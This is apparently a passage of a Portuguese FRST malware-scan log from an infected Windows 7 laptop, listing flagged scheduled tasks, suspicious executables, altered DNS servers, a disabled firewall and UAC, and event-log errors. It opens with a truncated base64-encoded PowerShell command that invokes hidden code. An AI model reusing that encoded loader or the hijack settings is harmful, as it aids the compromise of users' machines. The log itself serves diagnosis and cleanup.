sAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA== Task: {D8D9B90F-2779-4362-8EF0-8C65E3912461} - System32\Tasks\TYVBGGSEXDNVMURL => C:\ProgramData\Service7609\Service7609.exe [2016-01-27] () <==== ATENÇÃO Task: {EE5807FB-BFAE-47D4-B609-39B858E49FAE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.) Task: {F0E0E8AF-50E1-47F3-813A-BBA05071D7B2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated) Task: {F5EDFA31-2E38-43DA-AEE1-674D1151DA09} - System32\Tasks\Recovery Management\Burn Notification => C:\Program Files\Acer\Acer eRecovery Management\NotificationCenter\Notification.exe [2012-03-15] (Acer) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\TYVBGGSEXDNVMURL.job => C:\ProgramData\Service7609\Service7609.exe <==== ATENÇÃO ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) ==================== Módulos Carregados (Whitelisted) ============== 2016-02-04 10:10 - 2016-02-04 10:11 - 00408576 _____ () c:\windows\mtkw.exe 2016-02-04 10:10 - 2016-02-04 10:10 - 00417792 _____ () c:\windows\tkw.exe 2010-01-30 03:40 - 2010-01-30 03:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2015-02-25 19:58 - 2014-01-03 15:13 - 00111872 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll 2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () c:\programdata\msiql.exe 2014-02-25 23:11 - 2014-02-25 23:11 - 00086016 _____ () C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Map\MAP.dll 2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () C:\ProgramData\msiql.exe 2015-02-25 19:50 - 2013-10-01 07:09 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe 2015-10-24 11:12 - 2015-10-24 11:12 - 98422784 _____ () C:\Windows\SysWOW64\SYSJOSEJOAO-PC.exe 2016-02-18 09:31 - 2016-02-18 09:31 - 00689560 _____ () c:\windows\temp\32703\setup.exe 2016-02-18 09:31 - 2016-02-18 09:31 - 00157184 _____ () C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe 2016-02-11 11:33 - 2015-05-25 08:32 - 00068432 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll 2016-02-11 11:33 - 2015-08-06 01:51 - 00582144 _____ () C:\Program Files (x86)\Elex-tech\YAC\curlpp.dll 2016-02-11 11:34 - 2015-08-21 00:02 - 00176976 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unrar.dll 2016-02-11 11:34 - 2015-08-21 00:02 - 00087744 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unacev2.dll 2016-02-11 12:14 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll 2015-02-25 19:29 - 2013-12-09 21:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll 2016-02-11 11:33 - 2015-01-13 02:31 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll 2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2016-01-19 15:06 - 2016-01-19 15:06 - 00194048 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll 2016-01-19 15:06 - 2016-01-19 15:06 - 00110592 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll 2015-11-16 19:55 - 2015-11-16 19:55 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll 2015-11-16 19:56 - 2015-11-16 19:56 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll 2015-11-16 19:56 - 2015-11-16 19:56 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll 2015-11-16 19:56 - 2015-11-16 19:56 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll 2016-02-04 11:13 - 2016-02-04 11:13 - 00015064 _____ () C:\Windows\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll 2016-01-14 17:12 - 2016-01-14 17:12 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll 2016-01-14 17:11 - 2016-01-14 17:11 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll 2016-02-10 22:08 - 2016-02-09 09:58 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll 2016-02-10 22:08 - 2016-02-09 09:58 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt AlternateDataStreams: C:\Windows\System32:C50A5169_Cef.gbp ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" ==================== EXE Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) IE trusted site: HKU\.DEFAULT\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1010\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br ==================== Hosts Conteúdo: ========================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2009-07-14 00:34 - 2016-01-30 15:46 - 00000967 ____N C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-764792763-2688571116-1659716825-1007\Control Panel\Desktop\\Wallpaper -> C:\Users\josejoo\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-764792763-2688571116-1659716825-1010\Control Panel\Desktop\\Wallpaper -> C:\Users\joao.josejoao-PC.000\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 82.163.143.189 - 82.163.142.189 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Firewall do Windows está desabilitado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == (Atualmente não há nenhuma correção automática para esta seção.) ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{2F0C5BB3-5BF9-48CD-ADC0-E1D11880A780}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{1542AB6D-DB6A-4335-855F-13A5FCA43733}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{2F31A6BA-D110-47CD-B6F5-177AB9849494}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{BB76A5ED-5E0D-4B99-AC4A-1DB8675A7436}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{16A0E38E-B5F7-493E-8B26-EC813FA68B52}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe FirewallRules: [{2B2AC2AA-04EC-4A21-9611-89F06B76CFBD}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe FirewallRules: [{E1DD8812-C033-442E-B657-F43388539085}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe FirewallRules: [{D570674A-67ED-4F40-ABAB-DF5F7ECD5B0A}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe FirewallRules: [{E5CFDD74-FA6B-4C60-9A12-7911BB8C70AC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{3A15B57D-007A-4B57-8807-1A18E588C9A4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{9AA2A601-3E4E-4CA2-8DE1-0A55A6F34BAE}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{0E110D24-CD85-49CA-BEE7-56ABFAA33432}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{ADFE08B6-F637-4FF4-9D56-1F3C142699B0}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{92E6CF31-9195-427A-B896-7FE3C59E0A9D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{05050C04-DFFD-4F18-91EB-75DD13591E80}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{3BDBE8BC-1F42-4789-BDDE-DA487F8A5383}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [TCP Query User{934E79DB-0FCD-46CC-92D7-8AF9A9558973}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe FirewallRules: [UDP Query User{194F9058-7ADB-4F5A-A19F-74F582BF1E83}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe FirewallRules: [{8EBBE737-3118-4453-B83D-88AA892641AF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{9A9568DB-5DCC-4E09-B0CE-7AF5CB49FE1D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{9A64E5F4-EAF6-4AE7-A029-4C701FF6C7C9}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{4F0B63D4-7C65-4042-A326-D9DA2BE8F8C4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{47F7EAE8-B9F2-45AC-882E-F8B2CC9837EC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{2134188F-B0DB-44CF-878D-BD2DEB8331A7}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe FirewallRules: [{45E65790-1E8A-4637-9C4E-6862BC46A4E5}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{7CE4796C-AF0E-4044-904B-6B6E10F533EF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe FirewallRules: [{C27B8F18-59BA-4C1D-B213-C57B1376116A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{49B73378-69EB-4CF5-A345-2910A4577FA2}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe FirewallRules: [{0F25C8F0-99AB-4EB9-9B82-9BCFFA7C882F}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe ==================== Pontos de Restauração ========================= 04-02-2016 17:28:19 Ponto de Verificação Agendado 05-02-2016 08:50:38 Removed Adobe Flash Player 14 ActiveX. 11-02-2016 08:20:37 Windows Update 12-02-2016 10:15:00 Windows Update 12-02-2016 15:02:19 Windows Update ==================== Dispositivos Apresentando Falhas No Gerenciador ============= Name: Bluetooth USB Module Description: Bluetooth USB Module Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974} Manufacturer: Qualcomm Atheros Communications Service: BTHUSB Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: SBMNTR Description: SBMNTR Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: sbmntr Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: SPDRIVER_1.42.1.10638 Description: SPDRIVER_1.42.1.10638 Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: SPDRIVER_1.42.1.10638 Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (02/18/2016 09:40:00 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (02/18/2016 09:39:42 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: svchost.exe_SENS, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc3c1 Nome do módulo de falhas: iSafeSrvMon64.dll, versão: 6.7.30.28593, carimbo de hora: 0x55b5abeb Código de exceção: 0xc0000417 Deslocamento com falha: 0x0000000000005cc1 Identificação do processo com falha: 0x48c Hora de início do aplicativo com falha: 0xsvchost.exe_SENS0 Caminho do aplicativo com falha: svchost.exe_SENS1 FCaminho do módulo de falhas: svchost.exe_SENS2 Identificação do Relatório: svchost.exe_SENS3 Error: (02/18/2016 09:14:46 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Código de exceção: 0x40000015 Deslocamento com falha: 0x0003ef0d Identificação do processo com falha: 0x1120 Hora de início do aplicativo com falha: 0xHomePage.exe0 Caminho do aplicativo com falha: HomePage.exe1 FCaminho do módulo de falhas: HomePage.exe2 Identificação do Relatório: HomePage.exe3 Error: (02/18/2016 09:10:11 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: mediadownloadersetup.exe, versão: 0.0.0.0, carimbo de hora: 0x2a425e19 Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.23338, carimbo de hora: 0x56a1c6e6 Código de exceção: 0xc0000005 Deslocamento com falha: 0x0004def6 Identificação do processo com falha: 0xe58 Hora de início do aplicativo com falha: 0xmediadownloadersetup.exe0 Caminho do aplicativo com falha: mediadownloadersetup.exe1 FCaminho do módulo de falhas: mediadownloadersetup.exe2 Identificação do Relatório: mediadownloadersetup.exe3 Error: (02/18/2016 09:06:28 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1 Nome do módulo de falhas: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1 Código de exceção: 0x40000015 Deslocamento com falha: 0x00012d34 Identificação do processo com falha: 0x9fc Hora de início do aplicativo com falha: 0xMustangSer258.exe0 Caminho do aplicativo com falha: MustangSer258.exe1 FCaminho do módulo de falhas: MustangSer258.exe2 Identificação do Relatório: MustangSer258.exe3 Error: (02/18/2016 09:05:58 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804 Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804 Código de exceção: 0x40000015 Deslocamento com falha: 0x0003dd0a Identificação do processo com falha: 0x1aec Hora de início do aplicativo com falha: 0xLightGate.exe0 Caminho do aplicativo com falha: LightGate.exe1 FCaminho do módulo de falhas: LightGate.exe2 Identificação do Relatório: LightGate.exe3 Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Código de exceção: 0x40000015 Deslocamento com falha: 0x0003ef0d Identificação do processo com falha: 0x1b08 Hora de início do aplicativo com falha: 0xHomePage.exe0 Caminho do aplicativo com falha: HomePage.exe1 FCaminho do módulo de falhas: HomePage.exe2 Identificação do Relatório: HomePage.exe3 Error: (02/18/2016 08:31:39 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477 Código de exceção: 0x40000015 Deslocamento com falha: 0x0003ef0d Identificação do processo com falha: 0xcec Hora de início do aplicativo com falha: 0xHomePage.exe0 Caminho do aplicativo com falha: HomePage.exe1 FCaminho do módulo de falhas: HomePage.exe2 Identificação do Relatório: HomePage.exe3 Error: (02/18/2016 08:31:38 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804 Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804 Código de exceção: 0x40000015 Deslocamento com falha: 0x0003dd0a Identificação do processo com falha: 0xda4 Hora de início do aplicativo com falha: 0xLightGate.exe0 Caminho do aplicativo com falha: LightGate.exe1 FCaminho do módulo de falhas: LightGate.exe2 Identificação do Relatório: LightGate.exe3 Erros de Sistema: ============= Error: (02/18/2016 09:47:20 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT) Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC) Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Testador de instrumentação de gerenciam. do Windows, mas essa ação falhou com o seguinte erro: %%1056 Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Agendador de Classes de Multimídia, mas essa ação falhou com o seguinte erro: %%1056 Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Módulos de Criação de Chaves IKE e AuthIP do IPSec, mas essa ação falhou com o seguinte erro: %%1056 Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Pesquisador de Computadores, mas essa ação falhou com o seguinte erro: %%1056 Error: (02/18/2016 09:40:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Server, mas essa ação falhou com o seguinte erro: %%1056 Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Windows Update foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Testador de instrumentação de gerenciam. do Windows foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 120000 milissegundos: Reiniciar o serviço. Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Temas foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Detecção do hardware do shell foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. CodeIntegrity: =================================== Date: 2016-01-28 14:38:49.574 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz Percentagem de memória em uso: 74% RAM física total: 4023.36 MB RAM física disponível: 1034.13 MB Virtual Total: 8044.91 MB Virtual disponível: 4082.44 MB ==================== Drives ================================ Drive c: (Acer) (Fixed) (Total:448.39 GB) (Free:365.47 GB) NTFS Drive e: (JOSÉ JOÃO) (Removable) (Total:7.25 GB) (Free:4.63 GB) FAT32 ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 29F6CCD9) Partition 1: (Not Active) - (Size=17.3 GB) - (Type=27) Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=448.4 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 7.3 GB) (Disk ID: C3072E18) Partition 1: (Active) - (Size=7.3 GB) - (Type=0B) ==================== Fim de Addition.txt ============================